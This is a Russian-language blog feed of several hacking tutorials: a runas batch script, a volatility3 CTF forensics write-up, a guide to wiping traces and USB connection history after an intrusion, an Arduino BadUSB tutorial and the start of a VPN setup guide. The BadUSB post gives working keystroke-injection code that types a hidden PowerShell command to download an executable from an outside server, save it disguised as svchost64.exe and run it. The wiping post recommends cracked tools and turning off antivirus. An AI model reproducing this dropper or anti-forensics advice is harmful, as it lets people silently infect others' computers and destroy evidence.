Hunter Ghoul

Runas - пишем скрипт для запуска исполняемых файлов Windows от имени другого пользователя

2025-04-24T14:15:55.665Z

Всем привет! Сегодня мы с вами научимся писать свой первый простенький скрипт для командной строки Windows. В этой статье мы рассмотрим основные проблемы кодировок в CMD, команды вывода пользователей и фильтрации данных с помощью т.н. "конвейера", а также рассмотрим встроенную программу "runas"

Первым делом рассмотрим структуру нашего скрипта:

@echo off
chcp 65001
echo. & echo ---Текущее имя пользователя---
whoami
echo. & echo ---Имена всех пользователей---
chcp 866
echo.
wmic useraccount get name, status | find "OK"
echo. & echo --------------------
chcp 65001
echo. & set /p username="Введите имя пользователя: "
echo Выбран пользователь: %username%
set /p userpath="Перенесите сюда .exe приложение которое хотите запустить (не ярлык) и нажмите Enter: "
echo "Попытка запуска приложения..."
echo %username% %userpath%
runas /user:%username% %userpath%

Вот собственно наш код. Давайте подробнее изучим основные его строки.

chcp <номер кодировки> - отвечает за переключение кодировки в открытой cmd сессии. Это требуется для нормальной работы с кириллицей и латиницей, а также иными языками, плохо работающими на базовой Windows кодировке.

echo. - просто ставит enter в выводе в консоли, отображая ваше сообщение или результат выполнения команды на новой строке.

echo <ваше сообщение> - выводит сообщение на экран.

@echo off - убирает ваш ввод команд скрипта, что убирает лишний хлам в выводе в консоли.

set <имя переменной> <значение переменной> - сохраняет в памяти значение для заданной переменной. Если такой переменной нет, создает её и сохраняет в ней указанное значение.

set /p <имя переменной> <Placeholder - он же заполнитель текста> - дает возможность задать пользователю значение переменной с помощью ввода текста в CMD.

echo %имя_переменной% - выводит значение переменной. Использование %имя_переменной% в любом месте команд вставляет сохраненное значение переменной

runas /user:%username% %userpath% - запускает указанную программу от имени указанного пользователя.

whoami - вывод текущего пользователя с которого вы сидите

wmic useraccount - выводит в сыром виде все аккаунты

get name, status | find "OK" - фильтрует данные и выводит релевантные учетки.

Каков итог?

Теперь с помощью данного скрипта вы можете не меняя учетную запись запустить программу от имени другого пользователя. В ряде определенных случаев это бывает очень полезно, особенно когда вы на работе и нужно что-то запустить от имени админа, не выходя из рабочей учетки, но при этом классический метод запуска от имени админа заблокирован политикой безопасности.

Всё что нужно это:

1. Запустить скрипт

2. Выбрать нужного пользователя

3. Указать абсолютный путь в кавычках ИЛИ - просто перетащить EXE (важно, не ярлык) файл в консоль

4. Ввести пароль от выбранной учетки

5. Готово! Если прога поддерживает данную фичу, то всё успешно запустится и будет работать.

На этом всё. Такая вот простенькая и коротенькая статья, учащая базовым командам в cmd и написанию скриптов без всяких python и прочих зависимостей ^)

Write-up: расследуем бэкап VMware с volatility3

2024-11-16T10:54:46.800Z

Всем привет! Сегодня мы с вами будем проходить задание CTF по расследованию (forensic - компьютерная криминалистика) резервной копии виртуальной машины VMWare.

Приступим.

Вводные данные

И так, всё что мы имеем - это некий файл формата .vmem

Если погуглить инфу что это за файл, то найдем что это резервная копия VMware машины:

Ну и тут уже встаёт вопрос - как этот файл открыть и изучить? Логично в голову приходит желание скачать VMware Workstation, но спешу вас расстроить - из этого ничего не выйдет. Да и если получится импортировать бэкап (если что backup - это резервная копия, мало ли кто не знал ~~сочувствую вам~~) и запустить виртуальную машину, то мы нарушим тот временной промежуток в который была сделана резервная копия, ведь машина продолжит работать дальше и если там был например какой-то вирус шифровальщик, то он просто зашифрует нам машину.

Из этого следует, что стоит погуглить чем можно открыть данный файл:

Ну и здесь нам выпадают видео и статьи по решению данных проблем. Программа называется volatility3.

Переходим по ссылке выше и копируем ссылку на репозиторий:

Если у вас не установлен на системе git, то можете установить его, либо просто скачать архивом данный репозиторий и распаковать у себя в удобном месте.

Далее приступим к работе с данным инструментом.

Установка Volatility3

Что нам нужно установить перед этим:

Git (опционально) - скачать можно здесь.
Python - скачать последнюю версию здесь.
Volatility3 - скачать с репозитория.

Ну и в общем то всё, установка на любой системе Windows/Unix. Главное чтобы был python с pip.

Теперь заходим в распакованную папку с репозиторием. Лично я скачаю репозиторий с помощью git командой:

git clone https://github.com/volatilityfoundation/volatility3.git

Скачал в ту же папку где и находится наш файл

Открываем терминал в данной папке, идем в папку volatility3 и пишем команду:

pip install -r requirements.txt

У кого Unix система с разными питонами пишут соответственно для третьей версии:

pip3 install -r requirements.txt

Далее запускаем программу командой:

python vol.py -h

Для Unix аналогично по необходимости добавляем троечку:

python3 vol.py -h

На этом установка окончена.

Документация официальная здесь.

Расследуем инцидент (ну в смысле флаг дайте мне йоу)

Окей, установили, открыли, теперь разбираемся что тут происходит.

Для начала кто хочет повторить всё со мной скачайте файл бэкапа для расследования - скачать тут.

Как я писал в своем посте ранее (кто не читал вот ссылочка) у нас есть модули, поделенные на три раздела по системам:

windows.название_модуля
linux.название_модуля
mac.название_модуля

Ну соответственно формат команды в нашем случае примерно такой:

python vol.py -f путь_до_нашей_резервной_копии и далее команда.

Например:

python vol.py -f ../task.vmem windows.info

Здесь я указал относительный путь о котором писал в своих статьях ранее. Кто не читал рекомендую ознакомиться.

Здесь никто вам не мешает указать абсолютный:

python vol.py -f D:\download\love_keys\task.vmem windows.info

Если всё успешно, у вас пойдет процесс разбора копии и чтение его данных:

В данном случае не было информации какая именно система, так что сначала я попробовал пару команд для linux, что ни к чему не привело, затем к windows, и тут уже мне что-то показало:

Модуль windows.info показывает нам общие данные виртуальной windows системы.

Нам же для решения задачи нужно найти файл в котором спрятан флаг (в реальности это может быть вирус или что-угодно, улика в общем).

Для этого запустим следующую команду:

python vol.py -f ../task.vmem windows.filescan > file.txt

Здесь:

windows.filescan - вытягивает все файлы из системы
> file.txt - перенаправляет весь результат в файл

Теперь открываем наш файлик после выполнения команды (даже если выдало ошибку как у меня) любым удобным редактором, хоть блокнотом:

Здесь видим offset - это адрес памяти в котором хранится содержимое файла, и name - путь до файла с его названием.

Нам интересно следующее - давайте посмотрим какие есть пользователи в этой системе. Для этого выполним поиск по пути \Users\

Видим что у нас есть некий пользователь Oleg. Хорошо, давайте дополним наш путь \Users\Oleg\ и посмотрим что у нашего олега за файлы.

Пролистав некоторое количество строк видим такой вот интересный файл (хотя куда более интересно выглядит файл с базой данных на первом скрине, но да ладно).

Попробуем его выкачать. Для этого нам понадобится наш offset - то есть адрес памяти указанный слева:

Копируем его и вбиваем в следующую команду:

python vol.py -f ../task.vmem windows.dumpfiles --physaddr 0x1e47d5f0

Где:

windows.dumpfile - выкачивает из резервной копии наш файл
--physaddr offset_файла - указывает на файл который нам надо выкачать.

Если не указать адрес и ввести просто:

python vol.py -f ../task.vmem windows.dumpfiles

То эта команда выкачает все файлы из бэкапа.

Оно нам надо? Оно нам не надо. Вводим команду и получаем такой вот файл:

Теперь ищем его в папке с нашей утилитой

Отлично, откроем его с помощью того же блокнота:

Как видим кодировка не позволяет нам прочитать что тут написано.

У нас есть два варианта:

Вариант 1 (геморройный)

Идем на сайт https://2cyr.com/decode/ вставляем туда нашу абракадабру и нажимаем на ок:

После этого у нас появляется окно с возможностью выбрать адекватную кодировку. Смотрим на то, что более похоже на читаемый текст.

Находим что-то более читаемое в этих списках. Тыкаем на это и жмем на ок.

Окей, мы получили что-то, но ещё не то что надо. Пробуем следующие варианты из списка.

И в конечном итоге натыкаемся на вариант без всяких Ав ^ и прочих странных символов:

Вариант второй - ибо зачем вариант первый.

Качаем Notepad++ и открываем через него наш файл:

P.S. лично у меня в России этот блокнот провайдер заблокировал так как в нём спрятался самый опасный террорист в мире, так что кто тоже в беде можете скачать последнюю версию с моего канала.

Теперь нам остается только убрать все пробелы.

Для этого я написал простой скрипт на python который это сделает за вас. Просто скопируйте содержимое файла и вставьте в окно ввода программы:

Скачать скрипт можно здесь. Запуск командой:

python delnull.py

Итоги

Компьютерная криминалистика - интересное занятие, требующее усидчивости, хороших навыков в автоматизации анализа собираемой информации, в том числе с помощью написания собственных скриптов.

Попробуйте повторить данные действия дома чтобы поближе проникнуться в мир форензики.

Благодарю за прочтение статьи.

Bleach-Bitch - или чистим следы после взлома Пентагона

2024-11-14T12:25:28.034Z

Всем привет! Сегодня мы рассмотрим приложения для чистки следов и затирания жесткого диска. Приятного прочтения.

Дисклеймер

Автор статьи категорически против нарушения законодательства стран. Изложенная информация предоставлена исключительно в образовательных целях в шуточной форме. Использование данной информации для сокрытия улик жестоко карается по закону. Автор не несет ответственности за действия читателей.

Введение

И так, вы решительно удалили лучшее свое домашнее видео перед трудоустройством в силовые структуры. И тут всё бы ничего, ваш телефон забрали на проверку из-за некоторых опасений и дополнительном сборе информации. И вот ваш товарищ майор прикрывшись газеткой наяривает на вас и вашу жену. Как так вышло? Сейчас рассмотрим простым языком.

Жесткий диск (это то куда вы качаете с торрента репаки и майнеры) хранит в себе информацию по блокам. Все блоки представляют собой файловую систему, в которой хранится метаинформация и данные. А ещё в нем есть таблица разделов.

Блок - это часть жесткого диска, отвечающая за определенную часть хранения конкретных данных. Например загрузочный блок хранит в себе информацию для загрузчика. При запуске системы именно этот блок считывается компьютером первый, в котором лежит программа и все необходимые для неё данные для успешного запуска системы.

Метаинформация - это свойства хранимых файлов и папок в данном блоке жесткого диска. Например:

Помимо этих атрибутов ещё хранится прочая служебная информация о файле/папке для её успешного открытия, например диапазон адресов на которых хранится данный файл (в случае если файл не помещается в один блок). Однако всё это отлично друг от друга в зависимости от типа таблицы разметки.

Данные - это собственно данные программы.

Таблица разделов - это по сути та самая загрузочная часть и разделение на томы (диски). Вот таблицы разделов:

MBR - старая загрузочная таблица разделов, работает с BIOS.

GPT - новая, усовершенствованная система загрузки системы и разделения жесткого диска, работает с UEFI.

Если у вас старый ПК - вероятно у вас MBR. Если более современный - скорее всего GPT.

И последнее, файловая система - это таблица вашего диска, то, как будут храниться ваши данные. Вот они:

Файловые системы Linux

Файловые системы Windows

Правда про удаление файлов

И так, из теории выше следует вычленить несколько моментов:

Загрузочный раздел - оттуда можно получить инфу о вашей системе и в теории поискать изъяны. Рекомендую зашифровать загрузочный раздел, например использовав VeraCrypt.
Файловая система - от неё зависит как будут храниться наши данные на жестком диске

Теперь вернемся к тому как майоры смотрят чужие домашние фильмы.

Всё дело в удалении информации с жесткого диска.

Представьте, мы впервые устанавливаем винду/линукс на наш новенький жесткий диск (хотя он может и не новенький на самом деле). Первым делом мы его форматируем - то есть мы берем свою школьную тетрадь, стираем с неё все линии и выбираем, как будем её размечать: в клеточку; прописью; широкой прописью и так далее, в зависимости от того для какого предмета мы будем её использовать. Про красную линию само собой не забываем. Вот в жёстком диске всё точно также.

Окей, мы отформатировали диск, накатили систему, проги, документы и так далее.

Теперь важный момент про хранение и работы с хранимой на жестком диске инфой. Информация которая записывается на жёсткий диск, записывается в определенные блоки, каждый из которых разделен на ячейки по некоторое количество бит (в зависимости от выбранной файловой системы). И далее на нашем пк создается этот файл который мы можем открыть. Но на самом деле мы видем не наш файл с данными, а ссылку на адрес, в котором хранится информация о том, в каких блоках и ячейках хранится наш файл.

Понимаю, сложно, давайте вернемся к нашей тетради. Представьте, что вы разметили вашу тетрадь допустим в клеточку и ещё пронумеровали каждую страницу и каждую в ней строчку. И вот вы на какой-то случайно выбранной странице записали решение некого уравнения. Чтобы вам долго не искать где вы его сохранили, вы у себя на первой странице написали название этого уравнения и адрес (страницу и номер строчки) где вы написали его решение. Вот так если совсем по простому работает жёсткий диск. На самом деле мы оставляем себе несколько главных страниц, и отступив место начинаем сплошным текстом писать решения уравнений, а на главных страницах мы пишем название и прочую полезную информацию (метаинформация), номер страницы, номер строки, номер клетки начала нашего решения уравнения и номер окончания нашего решения уравнения, чтобы не спутать с другими данными.

А что происходит когда мы удаляем наш файл?

В таком случае происходит удаление не самих данных где записано наше решение уравнение, а ссылка на то, где это решение находится. То есть мы просто удаляем инфу о том, на какой странице, строчке, с какой там по счёту клеточки и до какой клетки мы записали решение уравнения (ибо мы храним инфу сплошняком без пробелов для экономии места на диске, а на главной странице просто пишем как из этого беспорядочного текста найти то что нам надо).

И как вы понимаете, в этом и кроется вся лазейка - всё что нам надо, это определить файловую систему, таблицу разделов и то, каким образом происходит запись на диск. Так и работают программы для восстановления данных.

Например попробуйте восстановить ваши удаленные в корзине файлы с помощью Auslogics File Recovery - скачать крякнутую версию можно здесь (предварительно отключите АВ на случай блокировки процедуры восстановления удаленных файлов).

Пример нахождения удаленной программы UFED 4PC.

Как мы видим, просканировав диск D мы нашли удаленные данные которые можем восстановить, хотя в корзине мы и ничего не смогли найти полезного.

Удаление файлов без восстановления

Всё в той же выше программе мы слева в меню можем выбрать различные очистки дисков, которые затерут наши данные нулями.

Вернемся к нашей тетрадке. Мы удалили информацию о том, где хранится наше уравнение. Но теперь, когда мы знаем все нюансы, мы можем удалить с помощью специальных программ (с помощью ластика) не просто где хранится наше уравнение, но и само его решение, при этом не стерев другие.

В компуктерах это называется "затереть нулями". То есть мы переходим по адресу где хранился наш файл, и затираем значения бит (которые образуют в совокупности информацию хранимую в файле) нулями - то есть, ничем. Таким образом полностью стирая файл с ~~лица земли~~ жесткого диска.

Для этого можем также использовать следующие программы:

Privazer - скачать тут.

Пожалуй лучшее решение для удаления всех следов из системы. Также присутствует функция бесследного удаления файлов, которые мы ещё не удалили, что гарантирует сразу полное затирание файла без возможности восстановления:

BleachBit - вероятно придется качать через VPN. Для винды можно скачать тут. Для линукса можно скачать на их официальном сайте.

Позволяет удалить большой спектр следов. Одно из лучших решений очистки, в том числе если щёлкнуть по иконке очистки также можно удалить файлы и папки с затиранием следов. Просто, удобно, эффективно (а главное бесплатно и бех кряков).

USBdeview - единственное рабочее приложение которое я знаю, удаляющее следы подключения к пк всех USB устройств (камеры, телефоны, принтеры и так далее).

Можете зажать левый SHIFT, щелкнуть по самому нижнему файлу для выбора всех подключений. Либо зажать левый CTRL и тыкнуть мышкой по тем, которые мы хотим удалить. Затем нажать на урну (второй значек). Либо на крестик (для извлечения устройств) а затем на урну для удаления следов подключения этого устройства к пк.

Немного о зеленых строчках:

Зеленым горит то, что сейчас в данный момент подключено к нашему пк. Так что заранее рекомендую отключить от пк всё то, что вам нужно почистить, а потом зайти в прогу и удалить. Но если это какой-то баг, то опять же - тыкаем на крестик, потом на урну. Должно сработать. Обычно используется данная прога офисными клерками перед проверками регуляторов которые запрещают подключать к пк свой телефон и смотреть там фоточки (но хотя для Сноу Денов тоже подойдет, чтобы замести факт подключения флешки и выкачивания секретных доков ЦРУ).

Glary Tracks Eraser - скачать можно тут. По сути тот же BleachBit с более приятным интерфейсом. Минусы - только под винду и не дает удалить файлы с папками, что ну просто ужас. Подходит для простой очистки следов пользования ПК.

Кажется давно я не выносил мусор...

HDD Low Level Format Tool - скачать кряк можно тут. Эта прога полностью форматирует диск затирая всё нулями. Подходит когда нужно полностью почистить весь диск без возможности восстановления. Если захотите почистить так системный диск, придется загрузиться через флешку с Live-образа и запустить очистку оттуда. ВАЖНО! - Чистит весь физический диск. Т.е. если у вас в пк один жесткий диск и разделен на диск С и D (как это обычно делают в винде) - то эта прога удалит и С и D диск, и загрузочный сектор, и вообще всё что там есть удалит и затрет. Перед использованием отключите АВ, ибо кряк палится антивирусами.

Вывод

Вот в общем то и подошла к концу данная статья. Какие выводы можно сделать из всего выше?

Файлы на самом деле не удаляются с вашего пк, удаляется лишь информация о том где они хранятся. Потом пока вы пользуетесь пк, другая программа может занять эту свободную область памяти и перезаписать собой этот сектор. Но вы уверены что вам так повезет?
Существуют программы для восстановления удаленных программ. Попробуйте использовать ту что я вам приложил и будете приятно удивлены.
Существуют методики удаления файлов с затиранием данных и очисткой следов во всех журналах. Пользуйтесь на здоровье
И последнее САМОЕ ВАЖНОЕ. Если вы храните backup вашей системы (точку восстановления на Windows) - майор просто сможет восстановить вашу порнушку и всё равно посмотреть её вместе со всем УВД под пивом. Так что не забудьте про это)

На связи был Hunter Ghoul, берегите свою конфиденциальность, не делитесь с майорами фильмом. Да и вообще не нарушайте закон, тогда и чистить ничего не придется, если вы не силовик и не выполняете свою служебную задачу.

Благодарю за прочтение статьи.

Arduino - свой флиппер за 1000 рублей (делаем BadUSB)

2024-11-06T12:45:41.139Z

Дисклеймер: все описанные действия предоставлены автором в ознакомительных целях. Большое спасибо моему товарищу подарившему и научившему азам использования данной прекрасной платы♥

Введение

Сегодня мы с вами разберем плату Arduino Leonardo - купить можно тут (внимание - Китай, подделка, но в принципе работает нормально).

Для сегодняшних манипуляций она более чем подойдет. Более подробно про разные платы можете почитать здесь (VPN maybe required) и здесь.

Arduino служит платой микроконтроллера. По сути это миникомпьютер, к которому можно прицепить нужные тебе модули и сделать полноценный карманно-носимый хакерский гаджет.

В этой статье мы с вами изучим атаку типа BadUSB с помощью Arduino Leonardo, в котором уже зашита поддержка эмуляции клавиатуры и мыши.

BadUSB - это атака, при которой подключенное к пк устройство распознается как клавиатура или мышь, и дальше исполняет payload (от англ. полезная нагрузка) для запуска вредоносного кода.

Начало программирования с Arduino

Для начала нам понадобится:

Плата Arduino Leonardo - купить можно например тут.
Программа Arduino IDE - скачать.
Возможно type-c провод для подключения платы к пк (если не придет вместе с платой).

И так, скачиваем и устанавливаем Arduino IDE.

Затем вам может потребоваться скачать и установить драйвер.

После установки перезагружаем пк, подключаем нашу плату к пк и запускаем прогу.

Ждем пока прога докачает и установит необходимые библиотеки.

Вся документация по установке, программированию, библиотекам и прочему - тут.

Для начала выберем наше устройство в меню подключенных устройств.

Затем зайдем в Tools и выберем следующие настройки

И так, после этого наша первичная настройка завершена.

Перейдем к разбору примера кода с codeby:

/* Мигание LED * ----------— * codeby.net * Включает и выключает светодиод (LED) подсоединенный * к выходу 13, с интервалом в 1 секунду * */ int ledPin = 13; // LED подсоединен к выводу 13 void setup () { pinMode (ledPin, OUTPUT); // устанавливаем вывод 13 как выход } void loop () { digitalWrite (ledPin, HIGH); // включаем LED delay (1000); // пауза 1 секунда digitalWrite (ledPin, LOW); // выключаем LED delay (1000); // пауза 1 секунда }

Здесь мы с вами подключаемся к нашему LED экрану на 13 выводе и пишем программу, чтобы у нас мигала лампочка каждую секунду (5 сек решил долго будет).

В void setup мы задаем как бы построчное исполнение программы, как в том же python условно говоря.

В void loop мы задаем также построчно программу, но это уже что-то вроде зацикленного цикла типа While True, так что здесь код будет постоянно повторяться вновь и вновь, что нам и нужно для того чтобы не писать самим бесконечный цикл на мигание лампочки.

Кстати если мы зайдем в File > Examples то увидим большое количество примеров кода, тыкнув на который у нас подгрузится готовый код. Мы его можем зашить в нашу плату и проверить работу, а также ознакомиться с самим кодом.

Так вот. Для того чтобы прошить наш код, нажимаем сочетания клавиш ctrl+R (компиляция и проверка кода). Если всё прошло без ошибок, то ctrl+U - это прошивка программы в нашу плату.

Пробуем, жмем ctrl+R:

Компиляция успешна, жмем ctrl+U

На китайской плате выдаёт такую ошибку, но это ~~рукожопость~~ недостаток самих плат собранных в подвале на коленке. Программа должна работать, проверьте, мигает ли у вас светодиод.

Мы можем изменить время включения и выключения лампочки, поменяв значение в delay (1000) на своё. Обратите внимание, значение даётся в миллисекундах.

Например поставим включенный светодиод на 1 сек, а выключенный на 0.5 сек:

Теперь у нас как-бы светодиод будет подмигивать, то есть быть дольше во включенном состоянии, моргая на пол секунды. Можно сделать наоборот чтобы было что-то вроде моргания пожарной сигнализации, поменяв значения местами. Вообщем, развелкайтесь).

Кстати код достаточно понятный, например в digitalWrite () видно, что значение HIGH отвечает за включение светодиода, а LOW за его выключение.

Обратите внимание!

После объявление глобальной функции void setup или void loop идёт следующий синтаксис:

Открываются вот такие скобки {}
Внутри них пишется на одной строчке команда.
Если это функция, то значение через пробел пишутся в таких скобках () и отделяются между собой запятой
Каждая строчка заканчивается точкой с запятой ;

Ну вот в общем то и всё, пойдемте тестить badusb код.

Простой BadUSB без цикла

Разберём простой код:

#include <Keyboard.h> void setup() { Keyboard.begin(); delay(2000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(50); Keyboard.releaseAll(); }

void loop() {

}

Такой простой код запустит на компьютере жертвы при подключении нашей платы программу Выполнить, встроенную в Windows.

Разберем что здесь написано:

#include <Keyboard.h> - подключает библиотеку по работе с клавиатурой. Документация.
Keyboard.begin(); - инициализирует библиотеку. Наша плата начинает эмулировать клавиатуру.
delay(2000); - даём паузу 2 секунды чтобы всё прогрузилось
Keyboard.press(KEY_LEFT_GUI); - кнопка левого виндовс (или комманд если macos и т.д.)
Keyboard.press('r'); - кнопка r
delay(50); - примерное время в 50 мсек, чтобы кнопки успели нажаться системой
Keyboard.releaseAll(); - отжимает все кнопки.

И так, теперь ещё раз:

Keyboard.begin(); делает из нашей платы клавиатуру (не забудьте вначале импортировать библиотеку командой #include <Keyboard.h>)
delay(мсек) даёт нам паузу. 2000 мсек нужно чтобы библиотека успела прогрузиться платой и системой, 50-75 мсек нужно для того чтобы клавиша прожалась
Keyboard.press (клавиша) выполняет функцию ЗАЖАТИЯ клавиши. Мы можем передать пробел и любую клавишу внутри скобок в кавычках, напр. Keyboard.press (' ') или Keyboard.press ('g'). Если нам нужно зажать ctrl или подобную клавишу, смотрим документацию, напр. шифт это KEY_LEFT_SHIFT и будет команда выглядеть так: Keyboard.press (KEY_LEFT_SHIFT). Что важно - БЕЗ КАВЫЧЕК.
Keyboard.releaseAll() ОТЖИМАЕТ ВСЕ КНОПКИ!!! Если не отжать то зажатые клавиши не дадут нормально пользоваться пк, не говоря о том что ваш payload не сможет выполниться. Хотя если у вас цель похулиганить можете убрать эту функцию и поприкалываться над товарищами.
И ещё есть команда Keyboard.release(клавиша) которая отжимает конкретную клавишу, если это вам конечно понадобится.

С кодом разобрались, давайте запустим команду:

Всё работает, остается только написать payload.

Давайте допишем нашу программу следующим образом:

#include <Keyboard.h> void setup() { Keyboard.begin(); delay(2000); Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(50); Keyboard.releaseAll(); Keyboard.press('c'); delay(45); Keyboard.releaseAll(); Keyboard.press('m'); delay(45); Keyboard.releaseAll(); Keyboard.press('d'); delay(45); Keyboard.releaseAll(); Keyboard.press(' '); delay(45); Keyboard.releaseAll(); Keyboard.press('/'); delay(45); Keyboard.releaseAll(); Keyboard.press('c'); delay(45); Keyboard.releaseAll(); Keyboard.press(' '); delay(45); Keyboard.releaseAll(); Keyboard.press('n'); delay(45); Keyboard.releaseAll(); Keyboard.press('o'); delay(45); Keyboard.releaseAll(); Keyboard.press('t'); delay(45); Keyboard.releaseAll(); Keyboard.press('e'); delay(45); Keyboard.releaseAll(); Keyboard.press('p'); delay(45); Keyboard.releaseAll(); Keyboard.press('a'); delay(45); Keyboard.releaseAll(); Keyboard.press('d'); delay(45); Keyboard.releaseAll(); Keyboard.press('&'); delay(45); Keyboard.releaseAll(); Keyboard.press('c'); delay(45); Keyboard.releaseAll(); Keyboard.press('a'); delay(45); Keyboard.releaseAll(); Keyboard.press('l'); delay(45); Keyboard.releaseAll(); Keyboard.press('c'); delay(45); Keyboard.releaseAll(); Keyboard.press(KEY_RETURN); Keyboard.releaseAll(); }

void loop() {

}

Алгоритм здесь следующий - мы просто хотим выполнить в программе Выполнить команду cmd /c notepad&calc которая запустит с помощью командной строки блокнот и клавиатуру.

Чтобы нам нажать на одну кнопку нам нужно написать три строчки:

Keyboard.press('кнопка'); delay(45); Keyboard.releaseAll();

Пробуем запустить прогу:

Как видим всё запустилось. Но если мы переключим раскладку на русский то всё поломается:

Закачиваем и запускаем вирусы

Теперь разберем код для скрытой загрузки и запуска файла:

#include<Keyboard.h> #define KEY_DELAY 50 const char command [] = " " ; void setup() { Keyboard.begin(); delay(3000); }

void loop() { //Pressing Win+r shortcut Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(KEY_DELAY*5); Keyboard.println("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object System.Net.WebClient).DownloadFile('http://server_ip/file.exe',\\\"$env:temp\\svchost64.exe\\\"); Start-Process \\\"$env:temp\\svchost64.exe\\\"\""); delay(KEY_DELAY*5);//A delay to ensure that cmd window has been started delay(10000000); }

Создаем VPS, устанавливаем apache2, загружаем на сервер наш вредонос. Забираем на него ссылку:

Вставляем ссылку в Keyboard.println () где это написано. прям в кавычки:

Keyboard.println("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object System.Net.WebClient).DownloadFile('http://62.113.104.126/crack.exe,\\\"$env:temp\\svchost64.exe\\\"); Start-Process \\\"$env:temp\\svchost64.exe\\\"\"");

Прошиваем и проверяем ctrl+U:

Как видим программа успешно скачалась и запустилась

Вам останется только поменять ссылку в кавычках DownloadFile('http://server_ip/file.exe', на своё значение.

Теперь остается затронуть последний момент - цикл.

Делаем цикл for для автоматизации ввода команды

Рассмотрим такой код:

#include <Keyboard.h> void setup() { Keyboard.begin(); delay(2000);

Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(50); Keyboard.releaseAll();

char* x = "cmd /c notepad&calc";

for (int i = 0; i < strlen(x); i++) { Keyboard.press(x[i]); delay(50); Keyboard.releaseAll(); } Keyboard.press(KEY_RETURN); delay(50); Keyboard.releaseAll(); }

void loop() {

}

Здесь в общем то вписывается в программу Выполнить команда cmd /c с последующей полезной нагрузкой. Но чтобы нам не вводить символы вручную, за нас создается счётчик i, который проходится по каждому символу из переменной x.

Всё что вам нужно - поменять содержимое x на своё, например:

char* x = "powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object System.Net.WebClient).DownloadFile('http://server_ip/file.exe',\\\"$env:temp\\svchost64.exe\\\"); Start-Process \\\"$env:temp\\svchost64.exe\\\"\"";

Тут как видим у нас ошибка из-за того что первая буква не успевает нажаться:

Попробуем добавить немного задержки после открытия программы Выполнить:

Теперь проверяем и всё работает:

Выводы

Arduino - достаточно дешевые и эффективные платы, которые подходят для самых различных задач, начиная от имитации клавиатур и мышек, заканчивая анализаторами радиотраффика и даже роботами.

В отличии от готовых флагманских решений типа Flipper Zero или HackRF ONE, arduino учит легкому погружению в язык программирования C, самостоятельному решению задач и сборке собственных портативных устройств для хакинга.

Подобные микроконтроллеры станут отличным стартом в мир аппаратного хакинга и сильно повысят ваши скиллы на фоне других участников комьюнити.

Благодарю за прочтение статьи.

Готовые скетчи с кодом для Arduino IDE можно скачать здесь.

Список полезной литературы

https://xss.is/forums/5/

https://xss.is/threads/76979/

https://xss.is/threads/125276/

https://xss.is/threads/124180/

https://xakep.ru/?s=arduino

https://xakep.ru/2021/06/17/gsm-ducky/

https://codeby.net/forums/oborudovanie-dlja-pentesta.192/

https://codeby.net/threads/besprovodnaja-hid-ataka-s-ispolzovaniem-arduino-mkr1000-utochka-dlja-wi-fi-seti.73761/

https://codeby.net/threads/kontroller-graficheskogo-interfejsa-dlja-proektov-arduino-remotexy.72260/

https://codeby.net/threads/sobiraem-dongl-dlja-raboty-s-beskontaktnymi-kartami.72019/

https://codeby.net/threads/bad-usb-ili-kak-ja-utok-razvodil-prakticheskoe-posobie-po-rubber-duck.71821/

https://codeby.net/threads/opredeljaem-kto-doma-s-pomoschju-esp8266.66662/

https://codeby.net/threads/arduino-totp-ili-google-authenticator-svoimi-rukami.61344/

AmneziaVPN - делаем свой VPN-сервер без всяких знаний

2024-11-04T15:44:38.838Z

Дисклеймер

Данная статья носит образовательных характер. Описанные действия используемые с целью обхода блокировок к информационным ресурсам могут караться действующим законодательством. Автор призывает не нарушать закон и использовать полученную информацию исключительно в образовательных целях.

AmneziaVPN - что это за зверь

Изображение AmneziaVPN. Источник - GitHub разработчика.

В условиях затянувшейся информационной войны вялые попытки установить тоталитарный контроль за источниками поставки информации в глобальной сети Интернет обретают всё более продвинутые методики. Регулирующие органы, ответственные за контроль оборота информацией, разрабатывают новые подходы к идентификации и блокировке ресурсов, подпадающих под определение опасных, не рекомендованных информационных источников и так далее.

В связи с всё больше растущим ограничением в свободном получении и обмене информацией, активисты, выступающие за права свободного обмена и получения информацией, разрабатывают различные приложения и протоколы обхода средств защиты интернет-провайдеров.

Одним из решений, о котором я вам сегодня хотел бы рассказать - кросс-платформерное приложение AmneziaVPN.

На удивление, посмотрев в Telegram инфу по данной тулзе, не нашёл большого количества статей на счёт этой штуки, что очень зря.

Нет статей, но тема обсуждаемая.

И тут я не просто так решил начать именно с данной приложухи - ведь с помощью её вы сможете развернуть множество сервисов для обеспечения своей анонимности без знаний и навыков работы с Linux сервером. И это прекрасно.

Помимо этого AmneziaVPN поддерживает огромное количество VPN протоколов:

Список доступных протоколов и иных сервисов.

Кто хочет подробнее прочитать про VPN - можете изучить мою небольшую статью.

Если кратко: VPN - это установление зашифрованного соединения между вашим устройством и сервером, на котором установлен VPN-сервис. В зависимости от сервиса будет использоваться какой-то конкретный VPN протокол, а для его работы будет использоваться какое-то конкретное приложение, которое поддерживает установление VPN соединения по этому протоколу. После установки соединения к ресурсам, на которые мы хотим зайти, заходим не мы, а наш сервер, как бы выступая посредником. Короче, в статье читайте, описал там.

Обычно такое соединение нужно для доступа к внутренним сервисам корпоративной среды, но обыватели чаще используют эту технологию чтобы получать доступ ко всяким заблокированным порнушкам, а хакеры и исследователи - для анонимности, проведения сканирований и анализа заблокированных (и не только) ресурсов.

Делаем свой VPN-сервер

И так, первое с чего начнем - это традиционно с аренды VPS. Арендовываем Linux сервер, в моём случае Ubuntu 24.04:

Арендованный сервер

В принципе вы можете найти дешёвый вариант за например 500 рублей в месяц и спокойно оплачивать сервак. А если поделитесь со своими товарищами и друзьями сервисом - можете поделить деньги на оплату и пользоваться им за сущие копейки, не боясь блокировки со стороны провайдера.

Теперь скачаем последнюю версию AmneziaVPN. Сделать это можно разными способами:

С оф. сайта - но может быть заблочен в вашей стране.
Воспользовавшись зеркалом - на случай если оф. сайт заблочен.
Скачать с GitHub - там же можно глянуть исходники приложения.

P. S. кстати можете почитать документацию (возможно потребуется VPN который мы щас сделаем).

